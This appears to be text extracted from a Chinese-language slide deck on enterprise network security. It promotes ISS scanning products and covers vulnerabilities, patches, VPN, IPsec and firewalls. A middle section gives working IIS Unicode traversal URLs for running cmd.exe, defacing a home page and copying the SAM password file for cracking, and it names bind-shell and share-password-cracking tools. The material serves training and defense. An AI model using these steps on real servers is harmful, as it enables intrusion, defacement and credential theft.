企业管理--提供的风险管理方案.ppt

NetworkSecurity,Scanningvulnerability,InternetScannerSystemScannerDatabaseScanner,ISSSAFEsuite提供的風險管理方案,VulnerabilityManagement,ThreatManagement,InternetScanner,ServerSensor,Manager,NetworkSensor,SystemScanner,DatabaseScanner,ISAMServer,弱點掃描系統,入侵偵測系統,報表系統回覆,ISSCenter,決策系統,ISAM的運作機制,運作流程,透過Intranet掃描,透過Internet掃描,可掃描範圍,可掃描TCP/IP網路環境下的所有裝置包括：FirewallRouterSwitchServer(Mail,Web,File)等等,服務掃描偵測Port掃描偵測後門程式掃描偵測密碼破解掃描偵測破解程式掃描偵測,InternetScanner安全稽核層次,Level1作業系統的種類,Level2作業系統的函式及服務,Level3對已被入侵系統的偵測或較不高明之駭客手法偵測,Level4對利用駭客工具對系統進行偵測,Level5有經驗的入侵者對系統進行偵測及系統的錯誤設定,E-mail掃描偵測瀏覽器安全性掃描偵測服務阻斷掃描測試NT安全性掃描偵測IPSpoofing掃描偵測SmartScan功能,SystemScanner,ScanfromInsideofSystemBackDoorCheckAccountAgeingAccessConfigurationcheckBaseLine(FileChanging)Check,SystemBaseAssessment,SystemScanner產品功能,Systemscanneragent重要資料鎖定利用安全的Checksum(SHA1)來監控重要資料或程式的完整及真實性。密碼檢測採用結合系統資訊、字典和詞彙組合的Rules來檢測易猜的密碼。Syslog和Textfile分析能針對SystemLogs和其它Textfile記錄檔的內容做分析。動態式的警訊當遇到違反掃描政策或安全弱點時提供即時警訊並利用email、SNMPtraps、SystemLogs、呼叫應用程式等方式回報給管理者。分析報表可依企業內不同職稱的人員產生易懂的分析報表。,DatabaseScanner產品功能,偵測資料庫的弱點:不佳密碼設定,過期密碼設定,久未使用帳戶偵測攻擊行為:未經授權人士嘗試登入資料庫偵測來自主機內、外部的威脅偵測密碼的弱點檢核到期的密碼偵測登入的時間使很久未使用的帳號設定為失效追蹤登入期間的限制活動記錄定時作業/自動化掃描,Attacktype,DenialofService,Disableorcorruptnetworks,systems,orservices,DDOS,HowdoesitWork?,SmurfAttackSmurfAttack,PortredirectionAttackRedirectionAttack,Backdoor,RootKit,Systemvulnerability,系統缺失導致安全漏洞,系統缺失導致安全漏洞事實上，目前網際網路環境的安全弱點，包含七項一般安全、六項Widows作業系統，以及七項Unix作業系統的弱點。其中一般弱點包含：以預設選項安裝作業系統及應用程式、未設定密碼或密碼選取不夠嚴謹、沒有備份或備援機制不完整、開放過多的連接埠、未過濾進出封包之網路位址、沒有存取紀錄或存取紀錄不完整、有漏洞的CGI程式。Windows作業系統的弱點，有：Unicode漏洞、ISAPI延伸程式的緩衝區溢位、IISRDS漏洞、NETBIOS未保護的網路資源分享、允許匿名連線導致資訊外洩、LANManager的密碼弱點。而Unix作業系統的弱點，則包含：RPC程式的緩衝區溢位、Sendmail的漏洞、Bind的弱點、R指令、LPD(remoteprintprotocoldatemon)、sadmindandmountd、預設的SNMP字串。,常見NT安全漏洞,影響:入侵者可以藉此漏洞修改網頁、獲得該主機或該網域的控制權限事件描述:自去年大陸入侵我政府網站事件以來，國內網站頻遭入侵。根據最近幾起案例分析，入侵者大多利用下列三種安全漏洞：1.密碼設定過於簡單管理者將密碼設定得太簡單，使得入侵者很容易以字典攻擊法或暴力攻擊法來猜測出密碼，而得以進入系統。2.權限過於鬆散有些管理者為了方便，並未將使用者權限做好設定，例如有些管理者為了方便將網站目錄設成anonymousftpuser可以寫入，使得入侵者不費吹灰之力修改其網頁。3.MicrosoftDataAccessComponents(MDAC)的安全漏洞這是目前系統管理者並未注意到的安全問題，入侵者可以利用這個漏洞完整控制該台NTserver或其所轄之網域。,解決方法:1.密碼避免以下列方式設定密碼與帳號名稱相同的密碼（例:帳號名稱abc密碼也設abc）字典中查得到的字（例:apple、bill、cat）身份證字號（例:A1234567890）日期（例:1010、20001010、891010）有順序之密碼（例abc123、abcABC、abc!#、1!23#、123qweasd等）2.將其權限劃分清楚，且將不必要帳號刪除，並設好ACL。,3.MDAC3.1.若不需要RDS請將其移除(1)刪除Webserver目錄下的msadc目錄(2)下列registrykey移除HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParametersADCLaunchRDSServer.DataFactoryHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParametersADCLaunchAdvancedDataFactoryHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParametersADCLaunchVbBusObj.VbBusObjCls,3.2.升級MDAC至2.1版，並開啟安全模式將registry中HKEY_LOCAL_MACHINESOFTWAREMicrosoftDataFactoryHandlerInfo裡面的handlerRequired值改為1(1為safemode)或是至,MicrosoftIIS4.0、5.0重大安全漏洞,影響:入侵者可以藉此漏洞或得該主機或該網域的控制權限影響平台:MicrosoftIIS4.0(NT4)MicrosoftIIS5.0(NT2000)事件描述:日前發現MicrosoftIIS4.0及5.0在unicode解譯方面有重大安全問題，當IIS收到含有某些特殊字元的的URL請求時，會認為是unicode，將其解碼，故入侵者可利用某些特殊來讀取系統內檔案，甚至對該IIS主機下達命令，造成重大安全問題。,如何測試:例如您公司的網站為.tw請在您的瀏覽器上輸入下列URL:.tw/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir%20c:若您看到瀏覽器秀出該IISserverc:下的目錄，請盡快更新您的IISserver。,說明:這是最近這些入侵者常用的一個安全漏洞，利用IISserver對unicode解譯誤判，從瀏覽器上以DirectoryTraversal的URL(.)執行cmd.exe進而將bindshell(例如ncx99.exe、nc.exe、winshell.exe等)或是backdoor程式(netspy、bo2k等）送進目標主機,如何解決:IIS4.0patch可以安裝在WindowsNT4.0ServicePacks5及6a上，WindowsNT4.0ServicePack7將會包含這個patch。IIS5.0patch可以安裝在Windows2000或ServicePack1上，Windows2000ServicePack2將會包含這個patch,MICROSOFTWINDOWSNTSYSTEMS,您的系統若有出現以下所列的檔案名稱，那可能指示你的系統已經被危及了，請小心謹慎的檢視，特別是MICROSOFTWINDOWSNTSYSTEMS。ntalert.exesysloged.exetapi.exe20.exe21.exe25.exe80.exe139.exe1433.exe1520.exe26405.exei.exe,除此之外，駭客經常使用的工具（如下列），系統管理者必須檢查未被授權的執行檔，以確保安全。lomscan.exemslom.exelsaprivs.exepwdump.exeserv.exesmmsniff.exe,密碼破解,資源分享共用級存取控制-需passwd但有安全漏洞,當設成需passwd時,駭客可使用各式密碼破解軟體,如WWWhack.Cain.Qwak使用者級存取控制-windownNT及windowns2000只能設成使用者級,所以需要user及passwd。,PQwak執行Pqwak時會要求使用者輸入3項IP:指令nbtstatahostname然後nbtstat-cShare:不需輸入Name:主機netbios名稱,指令nbtstatAXX.XX.XX.XX破解網絡上的芳鄰的程式，只需要很短時間，便可以破解有關的分享資源密碼。因為Windows存在有關漏洞。注意：由於該程式可以破解安全密碼，所以又被防毒程式列為病毒。,example,所以我們就可以用這種方法進入一些目錄。(1)8/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:inetpubscripts這樣我們將得到Directoryofc:inetpubscripts2000-09-2815:49DIR.1999-07-2117:49147,456Count.exe2000-09-1217:08438,290Count25.exe2000-10-1315:038,867counter.err2000-08-2323:07160,002,Copy,copyc:winntsystem32cmd.exec:inetpubscriptsccc.exe相對應的是http:/ip/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+ccc.exe其中/scripts/.%c1%1c./winnt/system32/cmd.exe?/c是固定的，他的作用是調用c:winntsystem32cmd.exe來執行命令。為什麼要拷貝cmd.exe了。因為微軟的iis加載程式的時候檢測到有串cmd.exe的話就要檢測特殊字元“%”，所以必須改名。,修改主網頁,我們就可以調用到cmd.exe了，就是說不用那個編碼了http:/ip/scripts/ccc.exe?/c+dir+c:inetpubscriptsExample修改主網頁default.asp8/scripts/ccc.exe?/c+echo+Hacker+c:inetpubwwwrootdefault.asp,抓取密碼檔,如果c:winntrepairsam._存在那麼我們把copyc:winntrepairsam._c:inetpubwwwroothttp:/ip/scripts/ccc.exe?/c+copy+c:winntrepairsam.+c:inetpubwwwroot然後用瀏覽器下載，用破NT密碼的工具，比如l0phtcrack來破,SNMP原理,PROTOS遠端SNMP攻擊工具程式,SNMP（簡易網路管理協定）的攻擊工具程式，且功能相當強大。這支PROTOSSNMP壓力測試軟體會把數千個測試程式從遠端系統送到SNMP常駐程式，以便找出程式本身的設計缺點或可加以利用的弱點。這支程式本身就能讓SNMP常駐程式及執行SNMP的硬體設備當機。這支程式可以將以下6種主要測試程式加以組合後執行。如果針對廣播位址,這支程式功能就更大,因此如果同時攻擊許多設備,這支程式的攻擊範圍勢必更廣。BitpatternexceptionBasicencodingrulesencodingexceptionFormatstringexceptionIntegervalueexceptionMissingsymbolexceptionOverflowexception,SNMPv1漏洞補救辦法,Step1:以弱點評估方式SNMP辨識使用中的服務掃瞄工具SNScan,Step2:安裝廠商提供的修補程式cisco:,SecuringSNMPinwindows/infosecFAQ/incident/SNMP.htmSecuringyourCiscorouterwhenusingSNMP/infosecFAQ/netdevices/router.htmWindows2000,SNMPandsecurity,Step3:SNMP關閉服務Windows98,windowsxp,windowsNT4,windows2000在服務清單上點選SNMP服務後,按兩下-於“服務狀態”下按停止CISCO在command-lineCiscoenablePasswd:*Cisco#setsnmpdisableCisco#showsnmp,STEP4:修改SNMP預設群組名稱Cisco#configtCisco(config)#access-list1permit55Cisco(config)#access-list1permit55Cisco(config)#access-list1denyanyCisco(config)#snmp-servercommunityltc2002RO1,Step5:以防火牆或ACL過濾SNMP連線CiscoIOSrouterCisco(config)#access-list101denytcpanyanyeq161logCisco(config)#access-list101denyudpanyanyeq161logCisco(config)#access-list101denytcpanyanyeq162logCisco(config)#access-list101denyudpanyanyeq162logCisco(config)#access-list101denytcpanyanyeq1993logCisco(config)#access-list101denyudpanyanyeq1993logCisco(config)#access-list101permitipanyany,STEP6:啟動入侵偵測系統進行監控,SQLInjection攻擊,說明SQLInjection比較貼切的中文翻譯應為SQL指令植入式攻擊，屬於InputValidation輸入正確性的問題。在使用SQL查詢的網頁程式中，駭客可將部份SQL指令作為輸入資料，若該網頁程式未對輸入資料做格式的確認及特殊字元的濾除，植入的SQL指令依據網頁程式設定的資料庫帳號權限而會造成不同的影響。若是資料庫管理者的權限則可對所有資料庫資料進行新增、刪除、修改及備份至其他主機，並能新增系統使用者及植入後門作為入侵其他主機的跳板。若是非管理者權限則影響較小，僅能對其擁有的資料庫進行權限以內的動作。但仍可透過猜測管理者密碼的方式取得管理者權限。造成SQLInjection並不是資料庫系統本身的問題，而是在這些網頁程式中未對使用者輸入的資料做檢查，造成駭客有機會可以植入惡意的SQL指令。所以諸如防火牆或是一般的弱點掃描工具並無法對防堵及偵測SQLInjection提供太大的幫助。,實際範例,建議方案,如何防止SQLInjection1.透過應用程式作資料庫查詢時.請不要使用SA或db_owner帳號權限。2.請關閉ODBC及SQLserver的錯誤訊息，這樣可以讓入侵者無法從這些訊息中來獲得進行SQLinjection或未來可能發生與InputValidation相關攻擊的必要資訊3.在使用SQL的網頁程式中加入檢查使用者輸入資料的程式碼。包含輸入資料格式的檢查（如身分證字號需檢查第一個字元為英文數字，後面九位為數字，並符合身分證字號檢查規則）4.過濾特殊字元的濾除（如：、-、;、等）請參閱WWWsecurityFAQ第六章Q7部分(/Security/Faq/wwwsf4.htmll)(,Solaris與LinuxRPCservice安全漏洞,影響:入侵者可以藉此漏洞修改網頁、獲得該主機管理權事件描述:在遭受攻擊的UNIX系統上，入侵者常利用下列rpc.ttdbserverrpc.cmsdrpc.statd/automountdsadmind程式之BufferOverflow漏洞自遠端入侵主機，rpc.statd可以讓外來使用者查尋這台主機的資訊；rpc.automountd可以在取得rpc的認證後，以root執行任何指令。將兩個組合起來，先以rpc.statd取得認證，接著再利用rpc.automountd可以以root執行任何指令的特點，就能夠在沒有任何授權的情況下控制這台主機。,解決方法:1.將不必要的RPCservice自/etc/inetd.conf中移除，移除方法為(1)編輯/etc/inetd.conf，將不必要的service前面加上#或直接刪除後存檔(2)kill-HUPinetd.pid2.安裝修補程式(patch)(1)rpc.statd及automountdSolaris:請依照您的版本安裝下列修補程式rpc.statd:,OSVersionPatchID_SunOS5.6106592-02SunOS5.6_x86106593-02SunOS5.5.1104166-04SunOS5.5.1_x86104167-04SunOS5.5103468-04SunOS5.5_x86103469-05SunOS5.4102769-07SunOS5.4_x86102770-07SunOS5.3102932-05,automountd:OSVersionPatchID_SunOS5.5.1104654-05SunOS5.5.1_x86104655-05SunOS5.5103187-43SunOS5.5_x86103188-43SunOS5.4101945-61SunOS5.4_x86101946-54SunOS5.3101318-92檔案可至下列URL下載ftp:/,RedHat:請參考下列URL:請參考下列URL：/security/2000/20000719aa,(2)rpc.cmsdSolaris:請依照您的版本安裝下列修補程式OpenWindows:SunOSversionPatchIDSunOS5.5.1104976-04SunOS5.5.1_x86105124-03SunOS5.5103251-09SunOS5.5_x86103273-07SunOS5.3101513-14SunOS4.1.4100523-25SunOS4.1.3_U1100523-25,CDE:CDEversionPatchID1.3107022-031.3_x86107023-031.2105566-071.2_x86105567-08檔案可至下列URL下載:ftp:/,(3)rpc.ttdbserverdSolaris:請依照您的版本安裝下列修補程式SunOSversionPatchID5.7107893-045.7_x86107894-045.6105802-115.6_x86105803-135.5.1104489-105.5.1_x86105496-085.5104428-085.5_x86105495-065.4102734-05檔案可至下列URL下載:ftp:/,(4)sadmindSolaris:請依照您的版本安裝下列修補程式OSVersionPatchIDSunOS5.7108662-01SunOS5.7_x86108663-01SunOS5.6108660-01SunOS5.6_x86108661-01SunOS5.5.1108658-01SunOS5.5.1_x86108659-01SunOS5.5108656-01SunOS5.5_x86108657-01,AdminSuiteVersionPatchID2.3104468-18(註)2.3_x86104469-18(註)註若有安裝AdminSuite，請安裝patch，因為AdminSuite可以安裝在SunOS5.3-5.7的版本檔案可至下列URL下載:ftp:/,/bin/login緩衝區溢位問題,許多的應用程式使用login來當成登入系統的認證機制。源自於系統的這些login存在著一個可被遠端攻擊的緩衝區溢位漏洞，攻擊者可以利用此一漏洞取得存取伺服器的root權限。,許多源自於SystemV執行login的系統，允許使用者可以處理像是環境變數這樣的特殊參數，而系統中會有一個緩衝區陣列，專門用來存放此一類的參數。在確認可被接受的參數數量中存在著一個漏洞，此一漏洞會造成此一緩衝區陣列發生緩衝區溢位的問題。在大部分的系統中，login是不可以suid的，所以login會使用該使用者的執行權限來進行動作。然而，如果login是被一個比一般使用者擁有更高特殊權限的應用程式呼叫，像是telnetd或是rlogind，那麼攻擊者就可以利用login的漏洞取得和此一應用程式一樣的存取權限。在telnetd或是rlogind的案例中，攻擊者可以得到root的權限,in.telnetd以及in.rlogind在網路上是如此的廣泛被使用，遠端的攻擊者不需要進行任何的先期存取系統行為，就可以利用此一漏洞來獲取存取系統的root權限。如果程式允許login可以suid成USER_A，那麼攻擊者就可以獲取得到USER_A的特殊權限。目前已經有專門針對此一漏洞的攻擊程式，而且可能已經在網路上流傳了。,telnetd緩衝區溢位問題,telnetd(telnetdaemon)乃是telnet伺服器所提供的服務。從BSD原始碼衍生出來的telnetdaemon有一個緩衝區溢位的安全問題，潛在駭客可以從遠端加以利用並進一步入侵。這個安全漏洞可以讓伺服器當機，或是讓入侵者取得root存取權限（系統管理員權限）進而執行所有的程式碼。問題telnetd程式乃telnet通訊協定的伺服器。從BSD原始碼衍生而來的telnetdaemon有一個緩衝區溢位問題，可讓入侵者從遠端加以利用。telnet通訊協定選項在處理的時候，系統會把telrcv功能的結果存在大小固定的緩衝區內。因為當初認為這些結果一定比緩衝區小，所以不會檢查是否超過其大小限制。,解決方式一、安裝修補程式目前除Cisco（思科系統）外，其餘如Berkeley軟體設計公司（BSDI）、Caldera、FreeBSD、IBM、NetBSD、SecureComputingCorporation等公司或組織皆已針對此一問題發佈修補程式或建議書。二、過濾封包若尚未安裝修補程式，則可用防火牆或封包過濾技術（如本公司代理的RealSecure系列產品）限制telnet通訊（大部分在port23/tcp）。另外可採禁止他人從外面以telnet連線方式以保護公司內部網路，此舉可減少被入侵的機會。不過關閉網路外圍的port23/tcp還是有可能被人從網路內部攻擊。網管人員務必瞭解網路設定和所需的服務種類，才能決定該採取何措施。,MicrosoftExchangeServer遠端緩衝區溢位弱點,MicrosoftExchangeServerInternetMailConnector（簡稱IMC）提供SMTP（簡易郵件傳輸協定）的功能。遠端攻擊者有可能設計一個特殊的要求，在有此弱點的Exchange伺服器上產生緩衝區溢位的狀況。這項缺點可能讓攻擊者使Exchange當機，或阻斷所有對內及對外的電子郵件傳送工作，或讓攻擊者完全控制該伺服器。,細節：IMC是微軟公司推出的SMTP實作，用來簡化網際網路上大部分的電子郵件作業。SMTP包括幾項基本作業，讓電子郵件的客戶端與伺服器用來互相確認身份、傳送電子郵件。EHLO指令便是其中一項基本作業。ExchangeIMC處理EHLO指令的方式有一項漏洞，這個指令用來查詢其他伺服器，以便列出哪些SMTP作業可被支援。執行EHLO指令時，被查詢的伺服器便會設法利用反向DNS查詢來辨識客戶端是誰。當電子郵件的客戶端連線到SMTP服務並送出一個EHLO指令時，伺服器會產生以下的回應，準備傳送給客戶端。,電子郵件伺服器名稱hello客戶端DNS名稱電子郵件伺服器名稱是執行電子郵件伺服器的系統名稱。客戶端DNS名稱是IMC對客戶端的IP位址執行反向DNS查詢後，所得到的名稱。雖然DNS名稱長度最高可達255個字元，但是用來產生該訊息的堆疊（stack）緩衝區卻不夠大，無法容納整個訊息。特別要注意的是，這個緩衝區有一項弱點，就是對電子郵件伺服器的名稱、hello文字、以及客戶端的DNS名稱來說都太小。因此有了合法的DNS反向查詢位址後，攻擊者便可導致緩衝區溢位的弱點。由於可傳送測試的EHLO指令來查詢電子郵件伺服器的名稱，所以導致緩衝區溢位的成功率非常高。IMC服務以superuser的權限或在SYSTEM安全環境下執行。攻擊者如果要利用這項弱點，可以利用自己的DNS伺服器、並控制反向查詢的回應；或採取假冒DNS的技術。,建議：必須安裝MicrosoftExchangeServerPack4才能安裝此修補程式。,NetworkSecurityStep,NetworkSecurityasaContinuousProcess,Networksecurityisacontinuousprocessbuiltaroundasecuritypolicy.Step1:SecureStep2:MonitorStep3:TestStep4:Improve,Secure,Monitor,Test,Improve,SecurityPolicy,Secure,Monitor,Test,Improve,SecurityPolicy,SecuretheNetwork,Implementsecuritysolutionstostoporpreventunauthorizedaccessoractivities,andtoprotectinformation.AuthenticationEncryptionFirewallsVulnerabilityPatching,Secure,Monitor,Test,Improve,SecurityPolicy,MonitorSecurity,DetectsviolationstothesecuritypolicyInvolvessystemauditingandreal-timeintrusiondetectionValidatesthesecurityimplementationinStep1,Secure,Monitor,Test,Improve,SecurityPolicy,TestSecurity,Validateseffectivenessofthesecuritypolicythroughsystemauditingandvulnerabilityscanning,Secure,Monitor,Test,Improve,SecurityPolicy,ImproveSecurity,Useinformationfromthemonitorandtestphasestomakeimprovementstothesecurityimplementation.Adjustthesecuritypolicyassecurityvulnerabilitiesandrisksareidentified.,HowdoesNetworksecurity,SecuringYourNetworkWithaVPN,VPN主要採用四項技術,TunnelingEncryption&DecryptionKeymanagermentAuthentication,IntranetVPN在公司遠程分支機構的LAN和公司總部LAN之間的VPN。通過Internet這一公共網絡將公司在各地分支機構的LAN連到公司總部的LAN，以便公司內部的資源共享、文件傳遞等，可節省DDN等專線所帶來的高額費用。,ExtranetVPN在供應商、商業合作夥伴的LAN和公司的LAN之間的VPN。由於不同公司網絡環境的差異性，該產品必須能兼容不同的操作平台和協議。由於用戶的多樣性，公司的網絡管理員還應該設置特定的訪問控制表ACL(AccessControlList)，根據訪問者的身份、網絡地址等參數來確定他所相應的訪問權限，開放部分資源而非全部資源給外聯網的用戶。,WhatitIPsec,IPSec是IETF(InternetEngineerTaskForce)定義的安全標準，它把幾種安全技術結合在一起形成一個較為完整的體系。通過對數據加密、認證、完整性檢查來保證數據傳輸的可靠性、私有性和保密性。IPSec由IP認證頭AH(AuthenticationHeader)、IP安全載荷封載ESP(EncapsulatedSecurityPayload)和密鑰管理協議組成。,WhatitIPsec,IPSec適應向IPv6遷移，它提供所有在網絡層上的數據保護，提供透明的安全通信。IPSec用密碼技術從三個方面來保證數據的安全。即：?認證。用於對主機和端點進行身份鑒別。?完整性檢查。用於保證數據在通過網絡傳輸時沒有被修改。?加密。加密IP地址和數據以保證私有性。,WhatitIPsec,IPSec協議可以設置成在兩種模式下運行：一種是隧道模式，一種是傳輸模式。在隧道模式下，IPSec把IPv4數據包封裝在安全的IPpacket，這樣保護從一個防火牆到另一個防火牆時的安全性。在隧道模式下，信息封裝是為了保護端到端的安全性，即在這種模式下不會隱藏路由信息。隧道模式是最安全的，但會帶來較大的系統開銷。IPSec也可用於連接其他層已存在的通信協議，如支持安全電子交易(SET：SecureElectronicTransaction)協議和SSL(SecureSocketlayer)協議。即使不用SET或SSL，IPSec都能提供認證和加密手段以保證信息的傳輸。,加解密技術,symmetriccryptographyDES,RC2asymmetriccryptographyRSA,Keymanagemebt,SKIP(simplekeymanagementforIP)ISAKMP/Oakley又稱IKE主要是利用Diffie-Hellman演算法,Authentication,PacketAuthentication當VPN的虛擬通道建立，資料要開始於通道上傳輸時，為了確保資料的完整性及確認其未被駭客修改過，便需利用一些封包認證的協定來達到此目的。常見的技術如AH、ESP、MD-5及SHA等協定。傳送者及接收者於加密通道建立時便需溝通好依何種封包認證技術來做資料的傳輸，故當接收者收到資料封包之後，便可利用事先約定好的封包認證方式來檢查封包是否在公眾網路傳輸時被修改過。,UserAuthenticationVPN既然允許遠端的用戶透過網際網路來進入企業網路內部存取資料，對於使用者身份的確認及權限的管理便極為重要。使用完整的安全認證伺服器(Authentication,AuthorizationandAccountingServer)，便可加強使用者的認證管理，以確保機密資料不會被非相關人員所讀取。,SecuringYourNetworkWithaFirewall,WhatIsaFirewall?,Afirewallisasystemorgroupofsystemsthatmanagesaccessbetweentwonetworks.,FirewallTechnologies,Firewalloperationsarebasedononeofthreetechnologies:PacketfilteringProxyserverStatefulpacketfiltering,PacketFiltering,Limitsinformationintoanetworkbasedondestinationandsourceaddress,ProxyServer,RequestsconnectionsbetweenaclientontheinsideofthefirewallandtheInternet,StatefulPacketFiltering,Limitsinformationintoanetworknotonlybasedondestinationandsourceaddress,butalsobasedonpacketdatacontent,TransportProtocols,SessionsinanIPWorld,InanIPworld,anetworksessionisatransactionbetweentwoendsystems.Itiscarriedoutovertwotransportlayerprotocols:TCP(TransmissionControlProtocol)UDP(UserDatagramProtocol),TCP,TCPisaconnection-oriented,reliable-delivery,robust,andhighperformancetransportlayerprotocol.TCPfeatures:SequencingandacknowledgementofdataAdefinedstatemachine(openconnection,dataflow,retransmit,closeconnection)Congestionmanagementandavoidancemechanisms,PIXFirewall,TCPHeader,IPHeader,ThePIXFirewallchecksforatranslationslot.Ifnot,itcreatesoneafterverifyingNAT,global,accesscontrol,andauthenticationorauthorization,ifany.IfOK,aconnectioniscreated.,,ThePIXFirewallfollowstheAdaptiveSecurityAlgorithm:(SrcIP,SrcPort,DestIP,DestPort)checkSequencenumbercheckTranslationcheck,Ifthecodebitisnotsyn-ack,PIXdropsthepacket.,#1,0,#2,#3,#4,Starttheembryonicconnectioncounter,Nodata,TCPInitializationInsidetoOutside,PrivateNetwork,SourcePort,DestinationAddr,SourceAddr,InitialSequence#,DestinationPort,Flag,Ack,0,,1026,23,49091,Syn,,0,23,1026,92513,Syn-Ack,49092,PublicNetwork,0,0,49769,Syn,0,0,23,1026,92513,Syn-Ack,49770,1026,23,PrivateNetwork,PublicNetwork,PIXFirewall,Resettheembryoniccounterforthisclient.Thenitincrementstheconnectioncounterforthishost.,,#5,0,#6,StrictlyfollowstheAdaptiveSecurityAlgorithm,DataFlows,TCPInitializationInsidetoOutside(cont.),0,0,1026,23,49770,Ack,92514,SourcePort,DestinationAddr,SourceAddr,InitialSequence#,DestinationPort,Flag,Ack,0,,1026,23,49092,Ack,92514,TCPHeader,IPHeader,UDP,ConnectionlessprotocolEfficientprotocolforsomeservicesResourcefulbutdifficulttosecure,PIXFirewall,TCPHeader,IPHeader,ThePIXFirewallchecksforatranslatio